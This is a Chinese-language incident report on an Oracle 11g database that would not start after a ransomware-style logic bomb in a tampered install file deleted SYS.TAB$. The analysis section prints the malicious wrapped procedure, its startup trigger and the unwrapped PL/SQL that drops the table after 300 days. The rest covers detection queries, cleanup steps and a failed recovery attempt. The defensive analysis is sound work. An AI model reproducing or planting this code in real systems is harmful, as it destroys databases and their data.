1. 故障现象
客户在进行灾备演练时,发现通过快照复制过来的数据库无法正常启动,报ORA-00600和16730的错误:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [],
[], [], [], [], [], []
Process ID: 29255
Session ID: 191 Serial number: 3
2. 故障分析
根据网上找到的资料,判断是数据库安装介质中被植入的恶意代码(勒索病毒的变种)在数据库运行了300天之后删除了sys.tab$表导致。以下是恶意代码的特征:
1)查看数据库软件的文件prvtsupp.plb,在程序包dbms_support的主体中可以看到多了以下内容:
cat $ORACLE_HOME/rdbms/admin/prvtsupp.plb
...
create or replace procedure DBMS_SUPPORT_DBMONITORP wrapped
a000000
369
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
7
166 17d
L+Q5S7kOFTBh3pJuFhl03zpaj2EwgzKur9zWZ47SR+pHN0Y8ER0IGya9iryn8BXxVZV99MqT
jPeDOVN1pQjRL9BBh4vtWEKCY/FfMGPnetcyOwrCiZd3y4XmBCby580I22k2zARou4x8Mwl7
GOEcpi6u23Rf2JOnTfA/PYL+pz7A1gvabRQrczX6dnK8HaHsERgX7VdwA3EsM784UwL6ESro
H+CNqON6SdF2HTUFBcmgBBPE/+blRgHQryEpxT3JOnEs1a8gUbjaLq+Xq9Eu9n/kdIwA+9ep
r59hpFLw/vnP7Cjaxk7WbJ6/XGj9F6DH+3MBxpFBmba1tk0pYAW1McQsYXNFbiSdxj1KnrmD
lUETCD2WIxfg3w==
/
PROMPT Create DBMS_SUPPORT_DBMONITOR TRIGGER
create or replace trigger DBMS_SUPPORT_DBMONITOR
after startup on database
declare
begin
DBMS_SUPPORT_DBMONITORP;
end;
/
unwrap多出的内容显示,恶意代码创建了一个存储过程DBMS_SUPPORT_DBMONITORP和触发器DBMS_SUPPORT_DBMONITOR,数据库在运行了300天以后在下一次实例重启时触发器会删除SYS.TAB$表,导致数据库无法启动。
PROCEDURE DBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
END IF;
END;
2)在还未重启的主库上可以看到恶意代码创建的存储过程和触发器,查看程序包的内容,和上面文件中显示的相同。
SQL> select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
2 where object_name like 'DBMS_STANDARD_FUN9 %'
3 union all
4 select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
5 where object_name like 'DBMS_CORE_INTERNAL %'
6 union all
7 select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
8 where object_name like 'DBMS_SYSTEM_INTERNAL %'
9 union all
10 select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
11 where object_name like 'DBMS_SUPPORT_INTERNAL %'
12 union all
13 select owner, object_name, OBJECT_TYPE, status, to_char(created,'yyyy-mm-dd hh24:mi:ss') created from dba_objects
14 where object_name like 'DBMS_SUPPORT%';
3)检查被植入恶意代码的数据库11g安装软件包的SHA1值,与官方下载的安装包不一致:
官方下载的安装包的SHA1值:
3. 故障处理过程
3.1. 备机恢复
由于主库运行300天后还没进行重启,没有触发恶意代码删除sys.tab$表。于是,对主库重新生成新的快照,使用新的快照来复制主库到备机。
1)在备机上启动数据库到挂载模式
SQL> startup mount;
2)在备机上禁用触发器,以避免打开数据库时触发恶意代码执行:
SQL> alter system set “_system_trig_enabled”=false scope=both;
3)在备机上打开数据库
SQL> alter database open
4)在备机上删除恶意代码创建的触发器和存储过程,删除程序包DBMS_SUPPORT
SQL> drop TRIGGER SYS.DBMS_SUPPORT_DBMONITOR;
SQL> drop PROCEDURE SYS.DBMS_SUPPORT_DBMONITORP;
SQL> drop PACKAGE DBMS_SUPPORT;
5)在备机上编辑$ORACLE_HOME/rdbms/admin/prvtsupp.plb文件,清除程序包dbms_support主体中以上列出的中比正常文件多出的恶意代码,或者直接清空文件。
6)在备机上启用触发器:
SQL> alter system set “_system_trig_enabled”=true scope=both;
3.2. 主机修复
执行3.1中的第4和第5步骤,清除主库中的恶意代码。
3.3. 尝试进行sys.tab$表修复
找了一个数据库专家使用bbed脚本(请参考https://blog.csdn.net/linsenaa/article/details/121094839)对已经删除了表sys.tab$的数据库进行数据文件扫描修复测试,成功修复后可以正常打开数据库,但对数据文件进行验证时,文件1有大量的逻辑损坏报错,如下所示:
RMAN> BACKUP VALIDATE CHECK LOGICAL DATABASE;
Error backing up file 1, block 145: logical corruption
Error backing up file 1, block 146: logical corruption
Error backing up file 1, block 147: logical corruption
...
Error backing up file 1, block 94699: logical corruption
Error backing up file 1, block 99995: logical corruption
Error backing up file 1, block 99996: logical corruption
=================
File Status Marked Corrupt Empty Blocks Blocks Examined High SCN
---- ------ -------------- ------------ --------------- ----------
1 FAILED 0 13436 90883 1013574
File Name: /u01/app/oracle/oradata/ORCL11G/datafile/o1_mf_system_kmfp8vnk_.dbf
Block Type Blocks Failing Blocks Processed
---------- -------------- ----------------
Data 564 56696
Index 0 11682
Other 0 9066
validate found one or more corrupt blocks
See trace file /u01/app/oracle/diag/rdbms/orcl11g/orcl11g/trace/orcl11g_ora_4766.trc for details
再次删除sys.tab$表时,数据库会报以下错误,不能删除该表,有可能是恢复的表结构不正常,导致无法对其进行删除:
SQL> delete sys.tab$;
delete sys.tab$
*
ERROR at line 1:
ORA-00600: internal error code, arguments: [kdBlkCheckError], [1], [145],
[6110], [], [], [], [], [], [], [], []
然而,在打开数据库后始终无法导出用户数据,报以下错误:
Export: Release 11.2.0.4.0 - Production on Mon Oct 10 00:38:51 2022
Copyright (c) 1982, 2011, Oracle and/or its affiliates. All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
ORA-31626: job does not exist
ORA-31633: unable to create master table "SYSTEM.SYS_EXPORT_SCHEMA_05"
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 95
ORA-06512: at "SYS.KUPV$FT", line 1038
ORA-01578: ORACLE data block corrupted (file # 1, block # 82296)
ORA-01110: data file 1: '/u01/app/oracle/oradata/ORCL11G/datafile/o1_mf_system_kmfp8vnk_.dbf'
因此,当sys.tab$表被删除时可能只能依赖于备份进行恢复,用bbed来进行恢复可能行得通但会非常复杂,恢复不完整将无法导出数据。